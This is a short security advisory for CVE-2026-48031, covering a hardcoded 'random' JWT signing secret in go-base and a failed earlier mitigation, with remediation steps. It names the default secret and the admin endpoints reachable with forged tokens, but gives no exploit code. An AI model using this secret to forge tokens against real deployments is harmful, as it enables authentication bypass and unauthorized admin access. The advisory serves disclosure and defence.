CVE-2026-48031

Name of the Vulnerable Software and Affected Versions go-base versions prior to the May 17, 2026 patch

Description The software contains a hardcoded JWT signing secret set to "random" in the dev.env template and as a programmatic fallback in the viper.SetDefault() function within cmd/serve.go. A previous attempt to mitigate this by replacing the secret with a randomly generated 32-byte string in auth/jwt/tokenauth.go was ineffective because it only checked for the literal string "random" and stored the replacement key in memory, causing all active sessions to be invalidated upon application restart.

An attacker can use the known secret to forge JWT tokens for any user, including those with administrative roles, leading to a complete authentication bypass. This allows unauthorized access to protected API endpoints, such as /api/v1/admin/users and /api/v1/me, and the ability to obtain new tokens via /api/v1/token/refresh. The vulnerability involves the GenTokenPair() function and the auth jwt secret variable.

Recommendations Update to the latest version of the software, regenerate the AUTH JWT SECRET using a strong value (e.g., openssl rand -base64 32), and restart the application.